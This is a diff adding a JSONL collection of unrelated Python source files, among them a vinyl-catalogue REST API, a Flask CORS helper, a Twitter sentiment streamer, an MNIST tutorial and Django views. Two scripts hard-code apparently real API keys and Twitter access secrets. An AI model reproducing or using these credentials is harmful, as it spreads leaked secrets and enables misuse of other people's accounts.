diff --git "a/4025.jsonl" "b/4025.jsonl" new file mode 100644--- /dev/null +++ "b/4025.jsonl" @@ -0,0 +1,793 @@ +{"seq_id":"480604320","text":"import webapp2\nfrom google.appengine.ext import ndb\nimport json\nimport db_models\nfrom datetime import datetime\n\nclass Vinyls(webapp2.RequestHandler):\n def post(self):\n \"\"\" Creates a new Vinyl Entity\n POST Body variables:\n name - required. Vinyl name.\n date - not required. The date of recording.\n no_tracks - required. The number of tracks on the album.\n length - required. The number of minutes of the album.\n genre - required. The genre of the album as a string.\n description - not required. The description of the album.\n artist - required. The name of the artist.\n \"\"\"\n #Only return a JSON, and warn user if it is not requested\n if 'application/json' not in self.request.accept:\n self.response.status = 406\n self.response.write(\"API only supports JSON\")\n return\n \n new_vinyl = db_models.Vinyl()\n name = self.request.get('name', default_value=None)\n date = self.request.get('date', default_value=None)\n no_tracks = self.request.get('no_tracks', default_value=None)\n length = self.request.get('length', default_value=None)\n genre = self.request.get('genre', default_value=None)\n description = self.request.get('description', default_value=None)\n artist = self.request.get('artist', default_value=None)\n\n if name and no_tracks and length and genre and artist:\n #Check that a vinyl by that name doesn't already exist\n q = db_models.Vinyl.query(db_models.Vinyl.name == name)\n match = q.fetch()\n if match:\n self.response.status = 400\n self.response.write(\"A vinyl already exists with that name.\\n\")\n return\n new_vinyl.name = name\n \n #Make sure the tracks supplied are integers\n try:\n new_vinyl.no_tracks = int(no_tracks)\n new_vinyl.length = int(length)\n except:\n self.response.status = 400\n self.response.write(\"Number of tracks and vinyl length must be integers.\\n\")\n return\n \n new_vinyl.genre = genre\n \n #Check that the artist ID exists\n try:\n q = db_models.Artists.get_by_id(int(artist))\n if q:\n new_vinyl.artist = ndb.Key(db_models.Artists, int(artist))\n else:\n self.response.status = 404\n self.response.write(\"The artist id was not found for that artist (perhaps a POST to /artist is in order?).\\n\")\n return\n except:\n self.response.status = 400\n self.response.write(\"The artist id must be a numeric value.\\n\")\n return\n\n if description:\n new_vinyl.description = description\n \n #Make sure the date is formatted correctly\n if date:\n try:\n new_vinyl.date = datetime.strptime(date, '%Y-%m-%d').date()\n except:\n self.response.status = 400\n self.response.write(\"Date must be in YYYY-MM-DD format.\\n\")\n return\n key = new_vinyl.put()\n #Add to the artist's list of albums\n q = db_models.Artists.get_by_id(int(artist))\n q.albums.append(ndb.Key(db_models.Vinyl, new_vinyl.key.id()))\n q.put()\n \n out = new_vinyl.to_dict()\n self.response.write(json.dumps(out))\n return\n else:\n self.response.status = 400\n self.response.status_message = \"Name, number of tracks, length, genre and artist are required.\\n\" \n return\n \n def get(self, **kwargs):\n \"\"\" Requests vinyls\n GET Body variables:\n id - if available, gives info on one vinyl by id, otherwise, provides all\n \"\"\"\n if 'application/json' not in self.request.accept:\n self.response.status = 406\n self.response.write(\"API only supports JSON.\\n\")\n return\n if 'id' in kwargs:\n try:\n out = ndb.Key(db_models.Vinyl, 
int(kwargs['id'])).get().to_dict()\n                self.response.write(json.dumps(out))\n            except:\n                self.response.status = 404\n                self.response.write(\"No vinyl found with supplied ID.\\n\")\n                return\n        else:\n            q = db_models.Vinyl.query()\n            all = q.fetch()\n            newl = []\n            for x in all:\n                newl.append(x.to_dict())\n            self.response.write(json.dumps(newl))\n    \n    def put(self, **kwargs):\n        \"\"\" Updates a vinyl\n        PUT Body variables:\n        id - if available, updates info on one vinyl by id, otherwise, error\n        \"\"\"\n        if 'application/json' not in self.request.accept:\n            self.response.status = 406\n            self.response.write(\"API only supports JSON.\\n\")\n            return\n        #If id is available, just update that one\n        if 'id' in kwargs:\n            #First check that the id is correct\n            try:\n                updatevinyl = ndb.Key(db_models.Vinyl, int(kwargs['id'])).get()\n                name = self.request.get('name', default_value=None)\n                date = self.request.get('date', default_value=None)\n                no_tracks = self.request.get('no_tracks', default_value=None)\n                length = self.request.get('length', default_value=None)\n                genre = self.request.get('genre', default_value=None)\n                description = self.request.get('description', default_value=None)\n                artist = self.request.get('artist', default_value=None)\n            except:\n                self.response.status = 404\n                self.response.write(\"No vinyl found with supplied ID.\\n\")\n                return\n            #Update just the name\n            if name:\n                q = db_models.Vinyl.query(db_models.Vinyl.name == name)\n                match = q.fetch()\n                if match:\n                    self.response.status = 400\n                    self.response.write(\"A vinyl already exists with that name.\\n\")\n                    return\n                updatevinyl.name = name\n            \n            #Make sure the tracks supplied are integers\n            if no_tracks:\n                try:\n                    updatevinyl.no_tracks = int(no_tracks)\n                except:\n                    self.response.status = 400\n                    self.response.write(\"Number of tracks must be integers.\\n\")\n                    return\n            \n            #Update date\n            if date:\n                try:\n                    updatevinyl.date = datetime.strptime(date, '%Y-%m-%d').date()\n                except:\n                    self.response.status = 400\n                    self.response.write(\"Date must be in YYYY-MM-DD format.\\n\")\n                    return\n            \n            #Make sure the length supplied are integers\n            if length:\n                try:\n                    updatevinyl.length = int(length)\n                except:\n                    self.response.status = 400\n                    self.response.write(\"Vinyl length must be an integer.\\n\")\n                    return\n            \n            #Update only genre\n            if genre:\n                updatevinyl.genre = genre\n            \n            #Update only description \n            if description:\n                updatevinyl.description = description\n            \n            #Update only artist\n            if artist:\n                #Check that the artist ID exists\n                try:\n                    q = db_models.Artists.get_by_id(int(artist))\n                    if q:\n                        updatevinyl.artist = ndb.Key(db_models.Artists, int(artist))\n                    else:\n                        self.response.status = 404\n                        self.response.write(\"The artist id was not found for that artist (perhaps a POST to /artist is in order?).\\n\")\n                        return\n                except:\n                    self.response.status = 400\n                    self.response.write(\"The artist id must be a numeric value.\\n\")\n                    return\n            \n            updatevinyl.put()\n            out = updatevinyl.to_dict()\n            self.response.write(json.dumps(out))\n            return \n        \n        #Otherwise, provided an error\n        else:\n            self.response.status = 403\n            self.response.write(\"Forbidden: Update all vinyls is not allowed\")\n            return\n    \n    def delete(self, **kwargs):\n        \"\"\" Deletes a vinyl\n        GET Body variables:\n        id - if available, deletes info on one vinyl by id, otherwise, error message\n        \"\"\"\n        if 'application/json' not in self.request.accept:\n            self.response.status = 406\n            self.response.write(\"API only supports JSON.\\n\")\n            return\n        #If id is available, just delete that one\n        if 'id' in kwargs:\n            #First check that the id is 
correct\n try:\n deletevinyl = ndb.Key(db_models.Vinyl, int(kwargs['id'])).get()\n out = deletevinyl.to_dict()\n #Get the associated artist with the album\n q = db_models.Artists.get_by_id(int(out['artist']))\n \n #if the album exists, delete it from the list\n if q.albums:\n newalbums = []\n for album in q.albums:\n if album.id() != deletevinyl.key.id():\n newalbums.append(album)\n q.albums = newalbums\n q.put()\n \n #Delete all comments associated with the vinyl being deleted\n q = db_models.Comments.query(db_models.Comments.vinylID == deletevinyl.key)\n match = q.fetch()\n if match:\n for x in match:\n x.key.delete()\n \n deletevinyl.key.delete()\n self.response.write(\"Delete Successful.\\n\")\n \n except:\n self.response.status = 404\n self.response.write(\"No vinyl found with supplied ID.\\n\")\n return\n \n #Otherwise, provided an error\n else:\n self.response.status = 403\n self.response.write(\"Forbidden: Delete all vinyls is not allowed\\n\")\n return","sub_path":"vinyls.py","file_name":"vinyls.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"60323140","text":"from machine import ADC\r\nimport os\r\nimport time\r\nadc = ADC(0)\r\n#adc_c = adc.channel(pin='P13',attn=ADC.ATTN_6DB) #pour une pile de 1.259V , print(adc_c.value()) donne 2520\r\nadc_c = adc.channel(pin='P13',attn=ADC.ATTN_0DB) #pour une pile de 0.629V , print(adc_c.value()) donne 2070\r\n\r\ndef createFile(nom):\r\n nom = nom+(\".txt\")\r\n file = open(nom,\"w\")\r\n return file\r\n\r\ndef writeFile(data,file):\r\n file.write(str(data)+(\"\\n\"))\r\n return\r\n\r\nfile = createFile(\"save3\")\r\n\r\nfor i in range(1000):\r\n adc_c()\r\n tension_thermi = adc_c.value()\r\n print(tension_thermi)\r\n writeFile(str(tension_thermi),file)\r\n time.sleep(0.2)\r\n\r\nfile.close()\r\n","sub_path":"test capteur/thermi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"729570","text":"'''\nSum all the elements in a list up to but not including\nthe first even number.\n'''\n\ndef sumUntilEven(lst):\n # your code here\n sum_lst = 0\n index = 0\n while index < len(lst) and lst[index] % 2 != 0:\n sum_lst = sum_lst + lst[index]\n index = index + 1\n return sum_lst\n\n\nprint(sumUntilEven([1, 3, 5, 7, 9, 2, 13, 11, 15]))\n","sub_path":"10_lists/exercises/10.30.11.py","file_name":"10.30.11.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"553484659","text":"from datetime import timedelta\r\nfrom flask import make_response, request, current_app\r\nfrom functools import update_wrapper\r\n\r\ndef crossdomain(origin=None, methods= None, headers= None,max_age=21600,attach_to_all=True,automatic_option=True):\r\n if methods is not None :\r\n methods=', '.join(sorted(x.upper() for x in methods))\r\n\r\n if headers is not None and not isinstance(headers,str) :\r\n headers=', '.join(x.upper() for x in headers)\r\n\r\n if not isinstance(origin,str) :\r\n origin=', '.join(origin)\r\n\r\n if isinstance(max_age,timedelta) :\r\n max_age=max_age.total_seconds()\r\n\r\n def get_methods():\r\n\r\n if methods is not None :\r\n return methods\r\n\r\n option_response=current_app.make_default_options_response()\r\n return option_response.headers['allow']\r\n\r\n def decorator(f):\r\n\r\n def wrapped_function(*args,**kwargs):\r\n\r\n if 
automatic_option and request.method=='OPTIONS' :\r\n                resp = current_app.make_default_options_response()\r\n            else:\r\n                resp = make_response(f(*args,**kwargs))\r\n\r\n            if not attach_to_all and request.method != 'OPTIONS' :\r\n                return resp\r\n\r\n            h = resp.headers\r\n            h['Access-Control-Allow-Origin'] = origin\r\n            h['Access-Control-Allow-Methods'] = get_methods()\r\n            h['Access-Control-Max-Age'] = str(max_age)\r\n            h['Access-Control-Allow-Credentials'] = 'true'\r\n            h['Access-Control-Allow-Headers']= \"Origin, X-Requested-With, Content-Type, Accept, Authorization\"\r\n\r\n            if headers is not None :\r\n                h['Access-Control-Allow-Headers']=headers\r\n\r\n            return resp\r\n\r\n        f.provide_automatic_options = False\r\n        return update_wrapper(wrapped_function,f)\r\n    return decorator\r\n\r\n\r\n\r\n\r\n","sub_path":"Backend/crossDomain.py","file_name":"crossDomain.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"582709299","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 18 15:45:59 2018\n\n@author: anand\n\"\"\"\n\nimport requests\nimport json\nfrom googleplaces import GooglePlaces, types, lang\nimport re \n\ndef find_location():\n\n    send_url = \"http://api.ipstack.com/check?access_key=7330ebb47134f617c30ce56abdb246e3\"\n    geo_req = requests.get(send_url)\n    geo_json = json.loads(geo_req.text)\n    latitude = geo_json['latitude']\n    longitude = geo_json['longitude']\n    city = geo_json['city']\n\n    location=str(latitude)+' '+str(longitude)\n\n\n    return location\n\ndef find_hospitals_police(location):\n    \n    google_places = GooglePlaces(\"AIzaSyCNLxPxFmG3kfrALBUkRFb_R5UdemVnqqQ\")\n\n    hospitals = google_places.nearby_search(\n            location=location,\n            radius=500, types=[types.TYPE_HOSPITAL])\n\n    hosp=str(hospitals.places[0])\n    hosp_spl= hosp.split('\"')\n    hosp=hosp_spl[1]\n    police_stations = google_places.nearby_search(\n            location=location,\n            radius=500, types=[types.TYPE_POLICE])\n    pol=str(police_stations.places[0])\n    pol_spl=pol.split('\"')\n    pol=pol_spl[1]\n    \n    return hosp,pol\n\n\n\ndef send_sms(h1,p1):\n    api_key=\" \" #enter your api key here \n    url = \"https://www.fast2sms.com/dev/bulk\"\n\n    payload1 = \"sender_id=FSTSMS&message=. 
/n Nearest Hosp:\"+h1+\"/n Nearest Police Station:\"+p1+\"&language=english&route=p&numbers=9841069732\"\n \n headers = {\n\n 'authorization': api_key,\n \n 'Content-Type': \"application/x-www-form-urlencoded\",\n\n 'Cache-Control': \"no-cache\",\n\n }\n \n response1 = requests.request(\"POST\", url, data=payload1, headers=headers)\n \n\n print(response1.text)\n\n\nlocation=find_location()\n\nhosp,pol=find_hospitals_police(location)\n\nsend_sms(hosp,pol)\n\n \n \n \n \n \n \n\n\n","sub_path":"alert_detection.py","file_name":"alert_detection.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"438912482","text":"try:\n import uasyncio as asyncio\nexcept Exception:\n import asyncio as asyncio\n\n\nclass WIFIActions:\n\n def __init__(self, env, core):\n self.mbus = core.mbus\n self.umod = core.umod\n self.mbus.sub_h(uid=\"WIFI-ACT\", topic=\"WIFI/#\", env=env, func=\"mod_ctrl\")\n\n def mod_state(self, mods, up, pld, cmd):\n for mod in mods:\n if mod[\"active\"] == \"1\" and mod[\"up\"] in up:\n mod_name = mod[\"name\"].split(\"cfg_\", 1)\n if mod_name:\n self.mbus.pub_h(tpc=\"{}/ctr/{}\".format(mod_name[-1], cmd), pld=pld)\n\n\n async def mod_ctrl(self, _id, _key, _pld, _rt):\n\n mods = await self.umod.call_db(method=\"_scan\", table=\"modules\")\n\n if mods:\n\n if _id == \"WIFI/sta/ip\" and _key == \"set\":\n self.mod_state(mods, [\"sta\", \"ap\"], _pld, \"start\")\n\n if _id == \"WIFI/ap/ip\" and _key == \"set\":\n self.mod_state(mods, [\"ap\"], _pld, \"start\")\n\n if _id == \"WIFI/sta/ip\" and _key == \"clear\":\n self.mod_state(mods, [\"sta\"], _pld, \"stop\")","sub_path":"ports/esp32/boards/temp/STRAGA_dev_kit1_8mb_core/modules/mod/net/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"401995537","text":"import requests\r\n\r\nrequests.post('https://petstore.swagger.io/v2/user',\r\n data={\"id\": \"1\",\r\n \"username\": \"User1\",\r\n \"firstName\": \"Ilya\",\r\n \"lastName\": \"Prokofiev\",\r\n \"email\": \"gsi@mail.ru\",\r\n \"password\": \"richard\",\r\n \"phone\": \"+375\",\r\n \"userStatus\": \"1\"})\r\n\r\nlink = 'https://petstore.swagger.io/v2/user/User1'\r\n\r\nr = requests.get(link)\r\nif r.status_code == 200:\r\n print ('User created')\r\nelse:\r\n print('User doesnt exist')\r\n\r\nrequests.put(link,\r\n data={\"id\": \"1\",\r\n \"username\": \"User1\",\r\n \"firstName\": \"Ilias\",\r\n \"lastName\": \"Prokofyeu\",\r\n \"email\": \"gsi@yandex.ru\",\r\n \"password\": \"richard\",\r\n \"phone\": \"+37529\",\r\n \"userStatus\": \"1\"})\r\n\r\nr = requests.get(link)\r\nif r.status_code == 200:\r\n print ('User updated')\r\nelse:\r\n print('Fail: user was not updated')\r\n\r\nrequests.delete(link)\r\nr = requests.get(link)\r\nif r.status_code == 200:\r\n print ('User deleted')\r\nelse:\r\n print('User was not deleted')\r\n\r\nr = requests.get(link)\r\nif r.status_code == 404:\r\n print ('User is not existing')\r\nelse:\r\n print('Try again')\r\n","sub_path":"CRUD via python/nik.py","file_name":"nik.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"594585543","text":"from sqlalchemy import Column, Integer, String, DateTime, func\n\n\nclass SurrogatePK:\n \"\"\"A mixin that adds a surrogate integer 'primary key' column named ``id``\n to any 
declarative-mapped class.\"\"\"\n\n __table_args__ = {'extend_existing': True}\n\n id = Column(Integer, primary_key=True)\n\n\nclass ValueMixin:\n __table_args__ = {'extend_existing': True}\n\n value = Column(String, unique=True, nullable=False)\n\n def __str__(self) -> str:\n return f\"{self.__class__.__name__}: {self.value}\"\n\n\nclass TimeSign:\n __table_args__ = {'extend_existing': True}\n\n created_at = Column(DateTime(timezone=True), default=func.now())\n updated_at = Column(DateTime(timezone=True), default=func.now(), onupdate=func.now())\n","sub_path":"utils/sqla/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"46806462","text":"def hotel_kosten(nachten):\n return nachten - (nachten // 3) * 140.50\n\n\ndef vliegtuig_kosten(stad):\n if stad == \"Barcelona\":\n return 183\n elif stad == \"Rome\":\n return 220\n elif stad == \"Berlijn\":\n return 125\n else:\n return 400\n\n\ndef huurauto_kosten(aantal_dagen):\n vast_auto = aantal_dagen * 40\n if aantal_dagen > 7:\n auto = vast_auto - 50\n return auto\n elif aantal_dagen < 7 and aantal_dagen > 3:\n auto = vast_auto - 20\n return auto\n else:\n auto = vast_auto\n return auto\n\ndef reis_kosten(stad, aantal_dagen):\n if stad !=\"Barcelona\" and stad !=\"Rome\" and stad !=\"Berlijn\" and stad!=\"Oslo\":\n print(\"foutboodschap\")\n else:\n hotel_kosten(nachten)+ huurauto_kosten(aantal_dagen) + vliegtuig_kosten(stad)\n\n\na = int(input(\"Geef hier het aantal nachten in:\"))\nb = str(input(\"Geef hier de verblijfplaats in\"))\nc = a + 1 #aantal dagen\n\nprint(reis_kosten(b,c))\nprint(hotel_kosten(a))","sub_path":"H5/Oefening_5.9.py","file_name":"Oefening_5.9.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"221084564","text":"# 3.4.1.15 Triangle\r\n# new class will be called Triangle and this is the list of our expectations:\r\n\r\n# the constructor accepts three arguments - all of them are objects of the Point class;\r\n# the points are stored inside the object as a private list;\r\n# the class provides a parameterless method called perimeter(),\r\n# which calculates the perimeter of the triangle described by the three points;\r\n\r\nfrom math import hypot\r\n\r\n\r\nclass Point:\r\n def __init__(self, x=0.0, y=0.0):\r\n self.__x = x\r\n self.__y = y\r\n\r\n def getx(self):\r\n return self.__x\r\n\r\n def gety(self):\r\n return self.__y\r\n\r\n def distance_from_xy(self, x, y):\r\n if x > self.__x:\r\n hx = x - self.__x\r\n else:\r\n hx = self.__x - x\r\n if y > self.__y:\r\n hy = y - self.__y\r\n else:\r\n hy = self.__y - y\r\n return hypot(hx, hy)\r\n\r\n def distance_from_point(self, point):\r\n px = point.getx()\r\n py = point.gety()\r\n return self.distance_from_xy(px, py)\r\n\r\n\r\nclass Triangle:\r\n def __init__(self, vertice1, vertice2, vertice3):\r\n self.__vertice1 = vertice1\r\n self.__vertice2 = vertice2\r\n self.__vertice3 = vertice3\r\n\r\n def perimeter(self):\r\n s1 = self.__vertice1.distance_from_point(self.__vertice2)\r\n s2 = self.__vertice2.distance_from_point(self.__vertice3)\r\n s3 = self.__vertice3.distance_from_point(self.__vertice1)\r\n return s1 + s2 + s3\r\n\r\n\r\ntriangle = Triangle(Point(0, 0), Point(1, 0), Point(0, 1))\r\nprint(triangle.perimeter()) # 
3.414213562373095\r\n","sub_path":"my_Triangle.py","file_name":"my_Triangle.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"61547733","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom values import *\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\ndef RK4_Integrate(xstart, ystart, dy, xend, numstep = 1000):\n\tx = np.linspace(xstart, xend, numstep)\n\tsteplen = x[1] - x[0]\n\ty = np.zeros(numstep)\n\ty[0] = ystart\n\tfor i in range(numstep - 1):\n\t\tk1 = steplen * dy(x[i])\n\t\tk2 = steplen * dy(x[i] + steplen / 2)\n\t\tk3 = steplen * dy(x[i] + steplen / 2)\n\t\tk4 = steplen * dy(x[i] + steplen)\n\t\ty[i + 1] = y[i] + (k1 + 2 * k2 + 2 * k3 + k4) / 6\n\treturn x, y\n\n\n\n# (E, Y) = RK4_Integrate(xstart = 0, xend = E_R_MAX, ystart = 0, dy = lambda arg: - dif(arg))\n\n\n# xs = 0\n# xe = 100\n# es = xs * 1E3 * CH_E\n# ee = xe * 1E3 * CH_E\n# (e, y) = RK4_Integrate(xstart = es, xend = ee, ystart = -Y[-1], dy = lambda arg: - dif(arg))\n\n\n\n#plt.semilogy(e / 1E3 / CH_E, y * 1E3 * 31536000)\nx = np.linspace(0.1, 100, 1000)\ny1 = np.zeros(1000)\ny2 = np.zeros(1000)\ny3 = np.zeros(1000)\n# e = x * 1E3 * CH_E\n# y2 = np.array(list(map(DIF, e))) * 1E3 * CH_E * 1E3 * 31536000 #per keV * ton * year\n\n# file = open('73Ge.dat', 'w')\n# for i in range(1000):\n# \tfile.write('%.5e\\t%.5e\\n' % (x[i], y2[i]))\n\nfile1 = open('131Xe.dat', 'r')\nfile2 = open('73Ge.dat', 'r')\nfile3 = open('40Ar.dat', 'r')\nline1 = file1.readline()\nline2 = file2.readline()\nline3 = file3.readline()\nn = 0\nwhile line1 and line2 and line3:\n\ty1[n] = float(line1.split('\\t')[-1])\n\ty2[n] = float(line2.split('\\t')[-1])\n\ty3[n] = float(line3.split('\\t')[-1])\n\tn += 1\n\tline1 = file1.readline()\n\tline2 = file2.readline()\n\tline3 = file3.readline()\n\nplt.figure(1, figsize = (8,6))\nplt.semilogy(x, y1, 'r')\nplt.semilogy(x, y2, 'g')\nplt.semilogy(x, y3, 'b')\nplt.legend(('Xe (A=131)', 'Ge (A=73)', 'Ar (A=40)'))\nplt.xlim([0,100])\nplt.xlabel('Nuclear Recoil Energy ' + r'$E_R$' + ' (keV)', size = 13, weight = 'bold')\nplt.ylabel('Rate ' + r'$dR/dE_R$' + ' (evts/keV/ton/year)', size = 13, weight = 'bold')\nplt.grid(b=True, which='major', color='grey', linestyle='--')\nplt.grid(b=True, which='minor', color='grey', linestyle=':', alpha = 0.4)\nplt.text(20, 0.5, r'$m_\\chi=100$GeV', horizontalalignment='center', verticalalignment='center', size = 15, weight = 'bold')\nplt.text(20, 0.3, r'$\\sigma_{\\chi-p}=10^{-45}$cm$^{2}$', horizontalalignment='center', verticalalignment='center', size = 15, weight = 'bold')\nplt.savefig('MyResult.png', dpi = 500)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Week2/NEWTRY/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"272845263","text":"n=int(input())\nnos=list(map(eval,input().split()))\nj=0\ncont=1\nm=0\ni=0\nwhile im:\n if smallm:\n m=c\n i+=1\nprint(m)\n\n\n\n\n\t\n\t\t\n\t\n\t\t\n\t\t\n\n","sub_path":"Pro26.py","file_name":"Pro26.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"98518980","text":"import tweepy\nimport matplotlib.pyplot as plt\nimport time\nimport json\nfrom textblob import TextBlob\nfrom tweepy.streaming import StreamListener\nimport re\n\nconsumer_key = 'ykU3M4ySMu5awQHcU2b1Td0uS'\nconsumer_secret = 
'9xkTXsldiSiQ38O4BO2feaLfparq7ZTmKUTmi2Ftx14V18Je0W'\naccess_token = '924306929660207104-FFGM4PyjGjKWd80PrHHxt5d2dObXemA'\naccess_token_secret = 'ezvyStkTjLP1MgcEeknmoPb8aJSidO8UK6mZCxoErmlsW'\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n\nclass listener(StreamListener):\n def on_data(self, data):\n global initime\n t = int(calctime())\n all_data = json.loads(data)\n public_tweets = all_data['text'].encode('utf-8')\n public_tweets = ' '.join(re.findall('[a-zA-Z]+', public_tweets))\n str_tweets = TextBlob(public_tweets.strip())\n global positive\n global negative\n global count\n global compound\n count = count + 1\n senti = 0\n for sen in str_tweets:\n senti = senti + sen.sentiment.polarity\n if sen.sentiment.polarity >= 0:\n positive = positive + sen.sentiment.polarity\n else:\n negative = negative + sen.sentiment.polarity\n\n compound = compound + senti\n print(count)\n print(str_tweets)\n print(senti)\n # print str(positive)+ ' ' + str(negative) + ' ' + str(compound)\n\n plt.axis([0, 70, -20, 20])\n plt.xlabel('Time')\n plt.ylabel('Sentiment')\n plt.plot([t], [positive], 'go', [t], [negative], 'ro', [t], [compound], 'bo')\n plt.show()\n plt.pause(0.0001)\n if count == 200:\n return False\n else:\n return True\n\n def on_error(self, status):\n print(status)\n\n\ntwitterStream = tweepy.Stream(auth, listener(1))\ntwitterStream.filter(track=[\"katy perry\"])","sub_path":"liveEx.py","file_name":"liveEx.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"133670605","text":"from setuptools import setup\nfrom distutils.extension import Extension\n\nCYTHONIZE_EQUIPPED = False\n\ntry:\n from Cython.Build import cythonize\n CYTHONIZE_EQUIPPED = True\nexcept ImportError as e:\n print('INFO :: Couldn\\'t load Cython.')\n\nextensions = [\n Extension(\"telium.constant\", [\"telium/constant.py\"]),\n Extension(\"telium.payment\", [\"telium/payment.py\"]),\n Extension(\"telium.manager\", [\"telium/manager.py\"])\n]\n\nsetup(\n name='pyTeliumManager',\n version='2.3.0',\n author='Ahmed TAHRI, @Ousret',\n author_email='ahmed@tahri.space',\n description=('A cross-platform point of sales payment manager tool with Telium Manager '\n 'Support every device with Telium Manager like Ingenico terminals.'),\n license='MIT',\n packages=['telium'],\n test_suite='test',\n url='https://github.com/Ousret/pyTeliumManager',\n download_url='https://github.com/Ousret/pyTeliumManager/archive/2.3.0.tar.gz',\n install_requires=['pyserial>=3.3', 'pycountry>=17.0', 'payment_card_identifier>=0.1.2', 'hexdump', 'six'],\n tests_require=['Faker'],\n keywords=['ingenico', 'telium manager', 'telium', 'payment', 'credit card', 'debit card', 'visa', 'mastercard',\n 'merchant', 'pos'],\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Win32 (MS Windows)',\n 'Environment :: X11 Applications',\n 'Environment :: MacOS X',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.1',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n 
ext_modules=cythonize(extensions) if CYTHONIZE_EQUIPPED else None\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"429729094","text":"#!/usr/bin/python\n\n#https://www.tensorflow.org/versions/r0.7/tutorials/mnist/beginners/index.html\n\nimport tensorflow as tf\n\n#read data\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot = True)\n\n#placeholder to hold the input features\nx = tf.placeholder(tf.float32, [None, 784]);\n\n#define the parameters of the regression\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\n\n#define the model\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n#placeholder to hold the input labels\ny_ = tf.placeholder(tf.float32, [None, 10]); #for example, if digit 1: [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\n\n#define the cost function, cross entropy\ncross_entropy = -tf.reduce_sum(y_ * tf.log(y))\n\n#training step\ntrain_step = tf.train.GradientDescentOptimizer(0.01).minimize(cross_entropy)\n\n#now, run the computation\ninit = tf.initialize_all_variables()\n\nsess = tf.Session()\nsess.run(init)\n\n#learn in batches of 100 input data, 1000 times => 100 000 input data\nfor i in range(1000):\n if (i + 1) % 100 == 0:\n print(\"> iteration %d\" %(i + 1))\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n#now test the model\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nprint(sess.run(b), sess.run(W))\nprint(\"accuracy: \", sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}) * 100)\n","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"82349127","text":"from .models import Event, Department\nfrom .forms import EventForm\n\nfrom datetime import date, timedelta\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\n\ndef index(request):\n departments_list = Department.objects.order_by('name')\n events_list = Event.objects.filter(event_date__gt = \n date.today()-timedelta(days=1)).order_by('event_date')\n context = {'events_list': events_list, \n 'departments_list' : departments_list}\n return render(request, 'events/index.html', context)\n\n\ndef department_events(request, department_name):\n departments_list = Department.objects.order_by('name')\n selected_department = get_object_or_404(Department, name=department_name)\n events_list = Event.objects.filter(department = selected_department, \n event_date__gt = date.today() - timedelta(days=1))\n context = {'events_list': events_list, \n 'departments_list' : departments_list, \n \"selected_department\": selected_department}\n return render(request, 'events/index.html', context)\n\n\ndef past_events(request):\n departments_list = Department.objects.order_by('name') \n events_list = Event.objects.filter(event_date__lt = date.today()) \n context = {'events_list': events_list, \n 'departments_list' : departments_list} \n return render(request, 'events/index.html', 